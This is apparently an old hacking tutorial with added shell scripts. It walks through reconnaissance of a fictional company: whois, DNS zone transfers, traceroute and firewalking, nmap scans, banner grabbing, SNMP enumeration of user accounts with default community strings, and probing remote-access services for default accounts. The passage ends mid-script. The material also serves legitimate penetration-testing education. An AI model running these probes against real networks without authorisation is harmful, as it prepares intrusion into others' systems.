
Target

First of all, you need to decide who your target will be. Script kiddies, of course, skip this step:
they go for the weakest victim they can find in a short time, by blindly scanning the internet for
open ports and applying exploits written by others.

We will, for this exercise, target an imaginary company, The Silly Software Company. In real
life, the target can be any system, for any reason.

Locate the target

When you've decided who your target will be, you'll have to be able to locate them on the
network - the internet, most often. That means you need to find some of their IP addresses, or at
least the IP address of one server or other host that belongs to your target company. If they have a
web server or a mail server, those addresses are easy to find, because they're needed for mail
transfer or for people to visit their web site. On the other hand, they may have their web site
hosted by an external company, or have their mail handled by their ISP's mail server, so you will
find those IP addresses instead of the company's. Still, there are a number of ways to find an IP
address.

Of course, script kiddies - again - skip this step because they blindly strike out at the easiest or
nearest victim: they scan for any system that uses the software for which they've downloaded an
'exploit'.

If you can't find an IP address easily, the next step may provide some.

Network Reconnaissance or "footprinting"

Who is ...

The WHOIS databases are maintained by the domain name registrars (the companies that sell
domain names such as google.com and bbc.co.uk) and by the regional Internet registries (ARIN,
RIPE, APNIC, ...) that hand out IP address blocks. The information in these databases can be
accessed with tools on your computer (unix/linux: whois), through web front-ends, or via features
in certain network administration tools, e.g. Sam Spade. The result may look like this:

microsoft.com

Registrant:
Microsoft Corporation (MICROSOFT-DOM)
1 microsoft way
One Microsoft Way
redmond, WA 98052
US

Domain Name: MICROSOFT.COM


Administrative Contact:
MICROSOFT CORPORATION msnhst@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
425 882 8080 fax: 206 703 2641

Technical Contact:
MICROSOFT CORPORATION msnhst@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
425-882-8080

Record expires on 03-May-2013.


Record created on 02-May-1991.
Database last updated on 21-Mar-2004 07:27:32 EST.

Domain servers in listed order:

DNS1.CP.MSFT.NET 207.46.138.20
DNS1.TK.MSFT.NET 207.46.245.230
DNS3.UK.MSFT.NET 213.199.144.151
DNS1.DC.MSFT.NET 64.4.25.30
DNS1.SJ.MSFT.NET 65.54.248.222

The information can be helpful to get the 'real life' picture of your target (company name,
address, phone number), possibly some additional email addresses, and so on. This can be used
for educated guesses at user names, passwords, email addresses, or for social engineering (see
further).

While people are usually good with words, computers are better with numbers. So a system has
been developed to translate names (server names, URLs, ...) into numbers (IP addresses), and vice
versa. This is the Domain Name System: a number of servers (DNS servers, name servers) that
hold databases with host names and addresses. Computers query these DNS servers to find the
address when they know the name, or the name when they know the address.

The whois info for a domain includes the name servers for that domain, so they're the next thing
you'll look into ...

DNS

DNS can be queried by any computer; otherwise your web browser would not be able to find the
IP address of 'www.playboy.com' when you're surfing the web, and your email program would not
be able to figure out where to send your email. Consequently, you can query DNS to find out
about a company's servers and their addresses. The tool to use is nslookup, which can be found
on any computer with TCP/IP (except those of the Windows 9x family); on unix/linux, host and
dig do the same job.

Say our target has a web site, www.silly.com. With

nslookup www.silly.com

we find that this site's IP address is 204.145.220.17. When we nslookup that address, we find it
belongs to My Dotcom. Apparently, the Silly Software website is hosted by My DotCom, and
we're not interested in them. So, let's see if we can find another server that belongs to the Silly
Software Company, maybe a mail server.

pc01# nslookup
> silly.com
Non-authoritative answer:
Name:      silly.com
Addresses: 204.145.220.17

> set type=ANY
> silly.com
        mail addr = ned.silly.com
silly.com nameserver = auth.ns.uu.net
silly.com nameserver = auth02.ns.uu.net

Authoritative answers can be found from:
auth.ns.uu.net   internet address = 222.145.220.213
auth02.ns.uu.net internet address = 81.86.235.2
mail.silly.com   internet address = 207.204.120.8

And there it is: we find the Silly Software Company's mail server at IP address 207.204.120.8.
Note that the 'mail addr' line comes from the SOA record and is the zone contact's mailbox, not
a mail server. The direct way to find the mail servers is to ask for the MX records ('set type=MX'
in nslookup); the 'host' example further down shows what those look like.

More from DNS?

So far, we've used our own (default) DNS server and had it query the Silly Software DNS server.
That tells us the name and address of the DNS server that is authoritative for the Silly Software
Company's silly.com domain. Next, we could also have nslookup interrogate the Silly Software
nameserver directly, by setting 'server auth.ns.uu.net'.

Sometimes, DNS servers allow you to download their entire database for a zone. Normally, they
should only allow this "zone transfer" to their own secondary DNS servers, but unless the system
administrator configured the server to restrict it, you can pull the complete zone with the ls -d
command in interactive nslookup (on unix/linux, 'host -l silly.com auth02.ns.uu.net' or
'dig @auth02.ns.uu.net silly.com axfr' do the same). In nslookup you can write the result to a
file with 'ls -d silly.com > file'. That gives you a complete list of all host names and addresses
in the zone - or at least the ones that DNS server knows. Try each listed name server in turn:
it only takes one that is misconfigured.

> ls -d silly.com
[auth02.ns.uu.net]
$ORIGIN silly.com.
@           6H IN SOA   auth02.ns.uu.net. hostmaster.uu.net. (
                        990570  ; serial
                        6H      ; refresh
                        1H      ; retry
                        2w6d    ; expiry
                        6H )    ; minimum
            6H IN NS    auth02.ns.uu.net.
            6H IN NS    auth51.ns.uu.net.
            6H IN A     216.222.35.189
sergey      6H IN A     207.204.120.25
scc_gate    6H IN CNAME scc-gate
scc-router  6H IN A     207.204.197.15
switch1     6H IN A     207.204.120.4
central     6H IN A     207.204.120.5
main_nt     6H IN A     207.204.120.9
mail        6H IN A     207.204.120.8
scc_router  6H IN CNAME scc-router
fw          6H IN A     207.204.120.1
scc-gate    6H IN A     207.204.120.6
www         6H IN A     204.145.220.17
uunet-gw    6H IN A     207.204.197.1
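
Here is an added example script (not part of the original page) that turns such an 'ls -d' listing
into a host inventory: it qualifies relative names with the $ORIGIN, attaches owner-less lines to
the previous owner, skips the multi-line SOA, resolves CNAMEs to the address of their target, and
sorts by address so the address blocks stand out. The zone it carries is a constructed excerpt of
the listing above; feed real output to zone_hosts on its standard input.

```sh
#!/bin/sh
# Added example (not from the original page): turn an nslookup "ls -d"
# zone listing into a "fqdn address" inventory.  The zone below is a
# constructed excerpt modelled on the silly.com listing in the text.
SAMPLE_ZONE='[auth02.ns.uu.net]
$ORIGIN silly.com.
@ 6H IN SOA auth02.ns.uu.net.
hostmaster.uu.net. (
990570 ; serial
6H ; refresh
1H ; retry
2w6d ; expiry
6H ) ; minimum
6H IN NS auth02.ns.uu.net.
6H IN A 216.222.35.189
sergey 6H IN A 207.204.120.25
scc_gate 6H IN CNAME scc-gate
scc-router 6H IN A 207.204.197.15
mail 6H IN A 207.204.120.8
scc_router 6H IN CNAME scc-router
fw 6H IN A 207.204.120.1
scc-gate 6H IN A 207.204.120.6
www 6H IN A 204.145.220.17
uunet-gw 6H IN A 207.204.197.1'

# zone_hosts: read a zone listing on stdin, print one "fqdn address" line per
# host.  Relative owner names are qualified with $ORIGIN, a line without an
# owner belongs to the previous owner, the multi-line SOA is skipped, CNAME
# chains are resolved to their target's address, output is sorted by address.
zone_hosts() {
  awk '
    function fqdn(n) {                         # relative name -> absolute
      if (n == "@") return origin
      if (n ~ /\.$/) return substr(n, 1, length(n) - 1)
      return n "." origin
    }
    function ipkey(ip,  p) {                   # zero-padded sort key
      split(ip, p, ".")
      return sprintf("%03d.%03d.%03d.%03d", p[1], p[2], p[3], p[4])
    }
    /^\$ORIGIN/ { origin = $2; sub(/\.$/, "", origin); next }
    NF == 0 || /^[ \t]*;/ { next }
    inparen { if ($0 ~ /\)/) inparen = 0; next }
    {
      for (i = 1; i <= NF && $i != "IN"; i++) ;
      if ($0 ~ /\(/ && $0 !~ /\)/) inparen = 1
      if (i > NF) next                         # no class field: not a record
      if (i > 1 && $1 !~ /^[0-9]+[smhdwSMHDW]?$/) owner = $1
      type = $(i + 1); rdata = $(i + 2)
      if (type == "A")     a[fqdn(owner)] = rdata
      if (type == "CNAME") c[fqdn(owner)] = fqdn(rdata)
    }
    END {
      for (n in c) {
        t = c[n]; hops = 0
        while ((t in c) && hops++ < 8) t = c[t]  # follow chains, bounded
        if (t in a) a[n] = a[t]
      }
      for (n in a) printf "%s %s %s\n", ipkey(a[n]), n, a[n]
    }' | LC_ALL=C sort | cut -d" " -f2,3
}

# sample_inventory: the inventory for the constructed zone above
sample_inventory() { printf '%s\n' "$SAMPLE_ZONE" | zone_hosts; }

sample_inventory
```

The sorted list is what you feed to whois next: consecutive addresses with the same registrant
are one block, and a name that resolves to an address in somebody else's block (www above, hosted
at My DotCom) is not part of the target's network at all.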

If a zone transfer fails (it should, really: zone transfers to foreign systems should be disabled by
the DNS administrator, but sometimes they forget), you can still do a DNS query of type 'ANY',
look for specific records (NS, MX), or just run the unix 'host' command against a list of
addresses, host names, or the domain name. Reverse lookups on every address of a block you've
found (host 207.204.120.1, host 207.204.120.2, ...) often recover most of the names anyway.

ix:~$ host microsoft.com


microsoft.com has address 207.46.197.32
microsoft.com has address 207.46.232.182
microsoft.com mail is handled by 10 maila.microsoft.com.
microsoft.com mail is handled by 10 mailb.microsoft.com.
microsoft.com mail is handled by 10 mailc.microsoft.com.

Back and Forth

Information from whois (the registrar database and the regional registries such as RIPE and
ARIN) gives you, amongst others, names and IP addresses of name servers, and network ranges
registered to the target company. DNS then reveals more names and addresses. IP addresses can
in turn be queried in whois, to reveal the registrant of the network range they belong to. With
some back and forth between whois and DNS, you end up with a nice list of (public) networks,
hosts, and their IP addresses. If the DNS administrator was careless enough to include internal
names and/or private (RFC 1918) addresses in the public DNS zone, you also get a first look at
what the internal LAN may look like.

When you run whois with an IP address, you find the network it belongs to, and other networks
owned by the same registrant. Here is a Microsoft example again:

ix:~$ whois 65.54.240.126

OrgName:    Microsoft Corp
OrgID:      MSFT
Address:    One Microsoft Way
City:       Redmond
StateProv:  WA
PostalCode: 98052
Country:    US

NetRange:   65.52.0.0 - 65.55.255.255
CIDR:       65.52.0.0/14

So, going back and forth between whois and DNS, it's trivial to find (at least the public parts
of) a network.

traceroute

During the 'footprinting' process, you've located a number of machines or networks. At this
point, you may want to stage a Denial of Service attack against one of those machines, if that
kind of thing is your goal.

You may also want to have a closer look at the company's network. Let's see which route an IP
packet follows from our system to those machines: we trace the route (with traceroute on
Linux or tracert on Windows). This shows all routers between our system and the Silly Software
Company's name server, including the router that connects them to the internet, maybe even their
firewall. We can do the same for their mail server, or any other server we know of.

traceroute / tracert

Tracing route to mail.silly.com [207.204.120.8] 30 hops max:

[...]
17   104 ms   103 ms   110 ms  0.so-3-0-0.XL1.NYC1.ALTER.NET [152.63.27.29]
18   104 ms   103 ms   103 ms  0.so-0-0-0.XR1.NYC1.ALTER.NET [152.63.19.85]
19   104 ms   123 ms   104 ms  207.ATM7-0.GW11.NYC1.ALTER.NET [152.63.22.145]
20   107 ms   112 ms   107 ms  scc-ext-gw.customer.alter.net [157.130.7.202]
21     *        *        *     Timeout
22 [...]
Trace completed.

Tracing route to central.silly.com [207.204.120.5] 30 hops max:

[...]
18   102 ms   103 ms   102 ms  0.so-0-0-0.XR2.NYC1.ALTER.NET [152.63.19.97]
19   110 ms   106 ms   103 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
20   106 ms   107 ms   106 ms  scc-ext-gw.customer.alter.net [157.130.7.202]
21     *        *        *     Timeout
[...]
Trace completed.

Comparing both routes with the IP addresses of the servers leads to a preliminary conclusion that
157.130.7.202 may be their external gateway (the router that connects them to the internet).

This router is on the route to the hosts we're tracing, but we get no replies from beyond it.
Most likely there is a device behind it that drops the traceroute probes, or the ICMP
"time exceeded" replies to them (a firewall?). More about how to interpret the timeouts, and
how to change the probe type and port, can be found in the traceroute man page. Classic
traceroute sends UDP probes and increments the destination port with every probe (starting at
33434 by default), so by choosing the starting port (-p) such that the probe that arrives at the
firewall hits a port the firewall permits (53, for DNS, say), that probe may be let through and
the hop behind the firewall becomes visible. Firewalk automates this idea: it sends probes with
a TTL one higher than the gateway's hop count, to a range of ports, and learns which ports the
gateway forwards from which of them produce a "time exceeded" from the next hop. There are
also TCP based versions of traceroute (tcptraceroute) that send SYN packets to a port the
firewall is known to pass, such as 80 for a web server.

War Dialing

In this day and age, who the fsck still uses modems?
You'd be surprised. Modems are still quite frequently used: in older, yet-to-be-upgraded
networks, for specific applications where network connectivity is not (yet) feasible, as a cheap
solution for vendor remote assistance (e.g. to a PBX), ...

So if you go war dialing, you may still find a number of modems, connected to PBXs,
personal computers, dial-up servers, ... The interesting part about them is that these modem
connections bypass any network firewall.

The best war dialing tools were developed for DOS PCs; ToneLoc is a fine example.

Wireless

With wireless networks all over the place, war dialing has been reinvented in the form of war
driving: looking around for wireless networks, then trying to connect to them. Other forms of
wireless data communication (Bluetooth, infrared, ...), especially with support for 'ad-hoc
networking', also deserve attention.

Enumeration

So far, so good

So far, we've collected a number of hostnames and their IP addresses, and we have a rough idea
of the IP range The Silly Software Company is using, so we can make an educated guess at other
IP addresses they may be using. We have at least one email address, so we can guess what other
email addresses may look like. We know a thing or two about the local network at the Silly
Software Company: at least the address of their external (border) router, maybe a bit more
(there's probably a firewall).

The next step is to collect as much additional information as possible. This is called 'enumerating
the network'. There are a lot of tools to be found on the web, but often they are just nice friendly
user interfaces for the techniques described below.

Websites ... may the source be with you

Web sites can be interesting. First of all, you might find some people's names, email addresses,
and other information that can be useful for 'social engineering'. The source code of the website
might be even more interesting, and it's readily available in your browser (although it may be
handier to just download the entire site, and use some text search and filtering tools to find what
you're after). Things of interest: scripts. Lazy or incompetent web developers resort to cheap
tricks in client-side scripts, e.g. values in 'hidden' fields, or clear text user names and passwords
in a database connect string. Looking at a website's source can reveal interesting information.

tools: wget, grep, ...

Explore

You could first explore a bit more, e.g. by tracing routes to other addresses in the same address
block. Hosts that don't reply to a ping might still become visible or reveal their hostname. It may
also give you a clearer picture of the IP ranges in use.

In this case, we might have assumed that The Silly Software Company uses a block of 16
addresses (i.e. 14 usable hosts) or a block of 32 addresses (30 hosts). The DNS listing, however,
revealed that more addresses are in use: a set of addresses spread from 207.204.120.1 up to
207.204.120.231. This suggests a complete class C sized block (207.204.120.0/24, hosts .1 to .254,
subnet mask 255.255.255.0), because the next smaller subnet (a /25, subnet mask 255.255.255.128)
holds only 126 hosts, either .1 to .126 or .129 to .254, so .1 and .231 could not both belong to
one of those. A couple of whois queries on those addresses should settle the matter.

Note that the DNS listing also shows a couple of addresses outside this range. When we trace a
route to that additional router, scc-router or 207.204.197.15, we notice that it lies behind the
external gateway, whereas the previous traces stopped at that gateway:

19   104 ms   108 ms   105 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
20   106 ms   108 ms   107 ms  scc-ext-gw.customer.alter.net [157.130.7.202]
21   112 ms   108 ms   107 ms  scc-router.silly.com [207.204.197.15]
Trace completed

This suggests the Silly Software Company has a second network, separate from the
207.204.120.0/24 network. Routers usually get the first or the last usable address of a block, and
uunet-gw sits at 207.204.197.1, so for now we assume a small block starting at 207.204.197.0,
say a /28 (subnet mask 255.255.255.240: 16 addresses, 14 usable hosts from 207.204.197.1 to
207.204.197.14). Be careful with that guess, though: in a /28 the address .15 is the broadcast
address, not a host, so a router at 207.204.197.15 does not fit it. Either the block is larger (a /27
runs to .30, a /24 to .254) or the guess is wrong; a whois query on 207.204.197.15 is the quickest
way to find out.
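
As an added example (not from the original page), here is the arithmetic behind these guesses
in plain POSIX shell: network, broadcast and usable range for an address in a given prefix,
where an address sits in its block (routers tend to take the first or the last usable address), and
whether two addresses can belong to the same block. It checks the two guesses above:
207.204.120.1 and 207.204.120.231 cannot share a /25, and in 207.204.197.0/28 the address .15
is the broadcast address, not a host.

```sh
#!/bin/sh
# Added example (not from the original page): subnet arithmetic in plain
# POSIX shell, to check guesses like "a router at .15 in a /28".

ip2int() {                      # dotted quad -> 32-bit integer
  set -- $(printf '%s' "$1" | tr '.' ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

int2ip() {                      # 32-bit integer -> dotted quad
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# subnet_info <address> <prefixlen>: network, mask, usable range, broadcast
subnet_info() {
  si_ip=$(ip2int "$1"); si_plen=$2
  si_mask=$(( (0xFFFFFFFF << (32 - si_plen)) & 0xFFFFFFFF ))
  si_net=$(( si_ip & si_mask ))
  si_bcast=$(( si_net | (~si_mask & 0xFFFFFFFF) ))
  if [ "$si_plen" -ge 31 ]; then        # /31 and /32 have no broadcast address
    si_first=$si_net; si_last=$si_bcast
  else
    si_first=$(( si_net + 1 )); si_last=$(( si_bcast - 1 ))
  fi
  echo "network=$(int2ip $si_net)/$si_plen mask=$(int2ip $si_mask)" \
       "first=$(int2ip $si_first) last=$(int2ip $si_last)" \
       "broadcast=$(int2ip $si_bcast) hosts=$(( si_last - si_first + 1 ))"
}

# address_role <address> <prefixlen>: where the address sits in its block
address_role() {
  ar_ip=$(ip2int "$1")
  ar_mask=$(( (0xFFFFFFFF << (32 - $2)) & 0xFFFFFFFF ))
  ar_net=$(( ar_ip & ar_mask ))
  ar_bcast=$(( ar_net | (~ar_mask & 0xFFFFFFFF) ))
  if   [ "$ar_ip" -eq "$ar_net" ];           then echo network
  elif [ "$ar_ip" -eq "$ar_bcast" ];         then echo broadcast
  elif [ "$ar_ip" -eq $(( ar_net + 1 )) ];   then echo first-host
  elif [ "$ar_ip" -eq $(( ar_bcast - 1 )) ]; then echo last-host
  else echo host
  fi
}

# same_block <address> <address> <prefixlen>: do both lie in one /prefixlen?
same_block() {
  sb_mask=$(( (0xFFFFFFFF << (32 - $3)) & 0xFFFFFFFF ))
  if [ $(( $(ip2int "$1") & sb_mask )) -eq $(( $(ip2int "$2") & sb_mask )) ]
  then echo yes; else echo no; fi
}

subnet_info 207.204.197.15 28
address_role 207.204.197.15 28                 # broadcast: the /28 guess does not fit
address_role 207.204.197.1 28                  # first-host: typical for a router
same_block 207.204.120.1 207.204.120.231 25    # no: not one /25
same_block 207.204.120.1 207.204.120.231 24    # yes
```

Run it with other prefix lengths (27, 26, 24) to see which block sizes do put 207.204.197.15 on
a usable address; those are the candidates to confirm with whois.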

We've also found the following interesting looking names:

name                           address          comment                      comment 2
scc-ext-gw.customer.alter.net  157.130.7.202    external gateway ?           on the ISP's network ?
fw                             207.204.120.1    firewall ?
scc-router                     207.204.197.15   another router ?             apparently in a different address range ...
scc-gate                       207.204.120.6    another gateway / router ?   routers usually have addresses at the start or the end of a range, so this would be unusual
switch1                        207.204.120.4    another gateway / router ?
uunet-gw                       207.204.197.1
fwext                          207.204.197.10
---                            207.204.120.254                               routers usually have addresses at the start or the end of a range, so we could check this one as well

Port Scan

We can now use a port scanner to see which ports are open (or closed, or filtered) on the hosts
we already know. This will give us information about what these machines are supposed to be
doing, and it may reveal some possible points of attack. nmap (Network Mapper) is a popular
port scanner. Its output may look something like this:

Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2004-03-21 12:03
Interesting ports on www.my.com (82.283.162.210):
(The 1648 ports scanned but not shown below are in state: filtered)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
26/tcp  open  unknown
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop-3
143/tcp open  imap
443/tcp open  https
995/tcp open  pop3s

Nmap run completed -- 1 IP address (1 host up) scanned in 135.290 seconds

nmap can also scan IP ranges, so it can be used to find other hosts on the network as well. Use
your knowledge of IP addressing and subnetting to define a suitable range, or (if you have the
time, or lack the knowledge) scan everything.

On top of that, and among other features, nmap can make a first guess at the operating system
used on the hosts you're scanning (the -O option), so there's another interesting piece of
information out there.

Here's a summary of a number of scans, merged into one listing (the command line shown is only
one of them, which is why the listing mentions more ports and hosts than that command would
scan). Nmap has several options, all of which can reveal something particular about the targeted
network.

# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: nmap -sS -O -P0 -R -p1352 -oN log 207.204.120.1-15

Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):
PORT     STATE    SERVICE
1352/tcp filtered lotusnotes

Device type: general purpose
Running: Microsoft Windows NT/2K/XP
OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes
[repeated at every host]

Interesting ports on firewall2.silly.com (207.204.120.2):
(The 65535 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE
747/tcp  filtered fujitsu-dev
1352/tcp closed   lotusnotes

Interesting ports on 207.204.120.3:
(The 65535 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE
747/tcp  filtered fujitsu-dev
1352/tcp closed   lotusnotes
1723/tcp filtered pptp

Interesting ports on switch1.silly.com (207.204.120.4):
(The 65535 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE
183/tcp  filtered ocbinder
1352/tcp filtered lotusnotes

Interesting ports on central.silly.com (207.204.120.5):
(The 65535 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE
1352/tcp open   lotusnotes
5631/tcp open   pcanywheredata
5632/tcp closed pcanywherestat
5900/tcp open   vnc

Device type: general purpose
Running: Sun Solaris 2.X|7, Microsoft Windows NT/2K/XP
OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP 6a + hotfixes

Interesting ports on scc_gate.silly.com (207.204.120.6):
(The 65535 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE
180/tcp  filtered ris
747/tcp  filtered fujitsu-dev
1352/tcp filtered lotusnotes

Interesting ports on 207.204.120.7:
PORT     STATE    SERVICE
1352/tcp filtered lotusnotes

Interesting ports on mail.silly.com (207.204.120.8):
PORT     STATE SERVICE
1352/tcp open  lotusnotes

Interesting ports on main_nt.silly.com (207.204.120.9):
PORT     STATE    SERVICE
1352/tcp filtered lotusnotes

[etc ..]

All 65535 scanned ports on 207.204.120.24 are: closed
All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed
All 65535 scanned ports on 207.204.120.26 are: closed
All 65535 scanned ports on 207.204.120.27 are: closed

Interesting ports on 207.204.120.28:
(The 65535 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE
1650/tcp filtered nkd

All 65535 scanned ports on 207.204.120.29 are: closed
All 65535 scanned ports on 207.204.120.30 are: closed

# Nmap run completed at Sat Mar 27 14:42:47 2004 -- 30 IP addresses (30 hosts up) scanned in 3409.766 seconds

The result is not bad: we get a list of hosts in the Silly Software network, their IP addresses, and a
number of interesting ports, some even with remote administration services already listening.
We can assume they have a firewall, because nmap reports a number of ports as 'filtered'. And
of course, the hostname firewall2.silly.com is a dead giveaway :-). One caveat: with -P0 nmap
skips the ping and treats every address as up, so "30 hosts up" proves nothing by itself. An "All
65535 scanned ports ... are: closed" line does tell you something, though: that address answered
the probes with TCP resets, so a machine is there (or a firewall that rejects, rather than drops,
on its behalf).

One more interesting point that shows up in the nmap output: the machine with IP address
207.204.120.25 is called sergey.silly.com. Sergey is a man's name. Could they be using public IP
addresses for (at least some of) their employees' workstations? And are workstations named
after their users?

Maybe we can send an email to sergey@silly.com and see what gives.

Also, they have that second 207.204.197.0/28 subnet that could be worth a closer look. And the
DNS resolution of some of the scanned addresses turns up interesting sounding names such as
'fw' (firewall?), 'fwext' (external firewall?), 'switch' (a switch with remote management? another
router?) and 'main_nt' (a Windows NT domain controller?) ...
And so on ...
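
An added example, not part of the original page: a small triage script for nmap's normal (-oN)
output like the listing above. It pulls every confirmed open port per host ("open|filtered" UDP
ports are left out, since they are not confirmed), then filters for the ports of remote-access
services (telnet, ssh, pptp, RDP, pcAnywhere, VNC; the list is my own choice, not nmap's) that
are worth pointing a client at first. The scan it carries is a constructed excerpt modelled on the
listing above; the "Nmap scan report for" header is the form newer nmap versions print. For
real work, nmap's -oG or -oX output is easier to parse than the normal output.

```sh
#!/bin/sh
# Added example (not from the original page): triage nmap "normal" (-oN)
# output.  The scan below is a constructed excerpt modelled on the listing
# in the text; the last host uses the header newer nmap versions print.
SAMPLE_SCAN='# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: nmap -sS -p- -oN log 207.204.120.1-9
Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):
PORT STATE SERVICE
1352/tcp filtered lotusnotes
Interesting ports on switch1.silly.com (207.204.120.4):
(The 65533 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
23/tcp open telnet
183/tcp filtered ocbinder
Interesting ports on central.silly.com (207.204.120.5):
(The 65531 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
1352/tcp open lotusnotes
5631/tcp open pcanywheredata
5632/tcp closed pcanywherestat
5900/tcp open vnc
Interesting ports on mail.silly.com (207.204.120.8):
PORT STATE SERVICE
25/tcp open smtp
1352/tcp open lotusnotes
All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed
Nmap scan report for 207.204.197.10
Host is up (0.10s latency).
PORT STATE SERVICE
161/udp open|filtered snmp
1723/tcp open pptp
# Nmap run completed at Sat Mar 27 14:42:47 2004'

# scan_open_ports: read -oN output on stdin, print "host address port service"
# for every port in state "open" ("open|filtered" is not confirmed: skipped)
scan_open_ports() {
  awk '
    /^Interesting ports on / || /^Nmap scan report for / {
      sub(/^Interesting ports on /, ""); sub(/^Nmap scan report for /, ""); sub(/:$/, "")
      if (match($0, /\(([0-9.]+)\)$/)) {      # "name (address)"
        addr = substr($0, RSTART + 1, RLENGTH - 2)
        host = substr($0, 1, RSTART - 2)
      } else { addr = $0; host = $0 }          # bare address, no reverse name
      next
    }
    /^[0-9]+\/(tcp|udp)/ && $2 == "open" { print host, addr, $1, $3 }'
}

# remote_admin_exposure: keep only ports of services that give interactive or
# VPN access and are worth pointing a client at first (my own list)
remote_admin_exposure() {
  scan_open_ports | awk '
    BEGIN {
      split("22/tcp 23/tcp 1723/tcp 3389/tcp 5631/tcp 5800/tcp 5900/tcp", l, " ")
      for (k in l) ra[l[k]] = 1
    }
    ($3 in ra) { print $2, $3, $4 }'
}

sample_open_ports()   { printf '%s\n' "$SAMPLE_SCAN" | scan_open_ports; }
sample_remote_admin() { printf '%s\n' "$SAMPLE_SCAN" | remote_admin_exposure; }

sample_open_ports
sample_remote_admin
```

The second list is the short one to work through first: a pcAnywhere or VNC service with a
default password, or a telnet prompt on a switch, gets you further than any of the filtered ports.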

Banner Grabbing

Now that you know the open ports, you can try to find out what software is being used for those
services. A quick and easy way to do that is to telnet (or netcat) to the host on that port. Sometimes,
the software replies with some sort of welcome message, or at least a command prompt, that tells
what software is behind it. Some port scanners will do this for you (recent versions of nmap do,
with the -sV option), or you may look on the internet for banner grabbing tools. Nessus is a known
name here. Nessus can also "test" the services in question to see if they are vulnerable to common
exploits, saving you the trouble of identifying vulnerabilities and finding suitable exploits yourself.

Here are some examples of what 'banners' may look like, and what they tell you.
You may find yourself welcome to a Linux system

Welcome to SuSE Linux 7.1 kernel 2.2.14

Have a lot of fun

or an old Lotus Notes Domino server

SMTP gateway for Lotus Domino r 4.6

or a POP3 server ...

+OK POP3 [cppop 9.9] at [209.51.159.225]

This information can later be used to look up what kind of attack, exploit, ... this particular
version of that specific software package is vulnerable to. Of course, things like VPN and
pcAnywhere services are tempting finds during a port scan: all you need for those is a VPN or
pcAnywhere client, and you can check whether the system administrator forgot to remove the
default accounts and change the factory settings. If so, these services are an open door into the
network.

Be precise about what the port states mean. 'open' means something accepted the connection.
'filtered' means nmap got no answer at all, or an ICMP "administratively prohibited" error: a
packet filter is dropping the probes, and you can't tell whether a service is listening behind it.
The filtering may be done on the host itself, or by a firewall or NAT router between you and
the scanned target. 'closed' means the port answered with a TCP reset: the probe reached a
machine, so the address is in use, but nothing is listening on that port - or a firewall that rejects
rather than silently drops answered on the machine's behalf.

snmp

snmp, the simple network management protocol, is a protocol to monitor devices remotely, over
the network. System administrators use it to monitor routers, switches, computers, printers, ... If
the snmp service is accessible from the outside, it can be used to collect a complete description
of the system in question, so it's worth checking. snmp services are usually configured with a
default "public" community that allows read access (and sometimes a "private" one that allows
write access). The community name serves as a password, and sysadmins forget to change it,
so ...
snmp version 3 supports proper authentication and encryption. Maybe it's time to upgrade, or
at least check your community names and restrict which addresses may talk to the agent.

snmp uses UDP (port 161), so it doesn't show up in a default (TCP) port scan. You can explicitly
scan UDP ports (nmap -sU -p 161), or just try to access snmp on the target(s) and see if it
responds.

# try an SNMPv1 GET of sysUpTime with the default community on every target
for target in $list_of_targets; do
    snmpget -v1 -c public $target system.sysUpTime.0
done

For those hosts where you can access snmp, you can use snmpwalk (or snmpbulkwalk, which
uses the more efficient SNMPv2c GETBULK requests) to walk the entire snmp tree.

# walk the whole tree of every host that answered
for item in $list_of_snmp_targets; do
    snmpwalk -v1 -c public $item
done

(Old ucd-snmp versions took 'snmpwalk host community' without the -v and -c options.)

snmp data is organized in modules ("MIBs"), and depending on the system you're interrogating, it
is useful to specify a subtree to get specific information. For instance, Microsoft's LanManager
MIB (LanMgr-Mib-II-MIB, under enterprise OID 77) lets you retrieve shared directories, sessions,
user account names, ... from a Windows system. On routers, you may be interested in the snmp
ip subtree, to find out about interfaces, routing tables, the ARP cache and address translation.
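
As an added example (not from the original page): a sweep that reports which hosts answer an
SNMPv1 GET with a given community, and a walk of the LanManager user table with a parser
that extracts the account names from snmpwalk's output. snmp_sweep and snmp_users need
net-snmp and a network; the walk output below is constructed, in the form net-snmp prints it,
so the parser can be tried offline.

```sh
#!/bin/sh
# Added example (not from the original page): an SNMP sweep and a walk of
# the Windows LanManager user table.  snmp_sweep and snmp_users call
# net-snmp's snmpget/snmpwalk and need a network; the walk output further
# down is constructed, in the form net-snmp prints, to try the parser offline.

# snmp_sweep <community> <host>...: print every host that answers an SNMPv1
# GET of sysUpTime with that community (1 s timeout, one retry)
snmp_sweep() {
  ss_comm=$1; shift
  for ss_host in "$@"; do
    if snmpget -v1 -c "$ss_comm" -t 1 -r 1 "$ss_host" SNMPv2-MIB::sysUpTime.0 >/dev/null 2>&1
    then echo "$ss_host"
    fi
  done
}

# svUserName from Microsoft's LanMgr-Mib-II-MIB: the account name table,
# enterprises(1.3.6.1.4.1).lanmanager(77).lanmgr-2(1).server(2).svUserTable(25)
LANMAN_USERS_OID=.1.3.6.1.4.1.77.1.2.25

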